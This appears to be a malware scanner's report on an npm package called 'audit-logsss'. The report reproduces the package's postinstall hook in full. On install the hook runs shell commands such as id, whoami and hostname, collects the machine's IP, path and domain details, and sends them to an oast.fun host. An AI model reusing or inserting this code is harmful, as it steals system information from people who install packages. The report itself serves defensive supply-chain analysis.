// offending code· 1 file flaggedpatterns: 6
--- install scripts ---
### postinstall
node -e "const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'audit-logs', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'yihpvsviuggxabauqtuedjfyzjlrtkpzx.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });"
--- package/package.json (excerpt) ---
{
"name": "audit-logsss",
"version": "8.0.9",
"description": "audit-logs",
"main": "index.js",
"scripts": {
"postinstall": "node -e \"const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'audit-logs', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'yihpvsviuggxabauqtuedjfyzjlrtkpzx.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });\""
}
}
--- dynamic destinations ---
→ yihpvsviuggxabauqtuedjfyzjlrtkpzx.oast.fun (via hostname-var)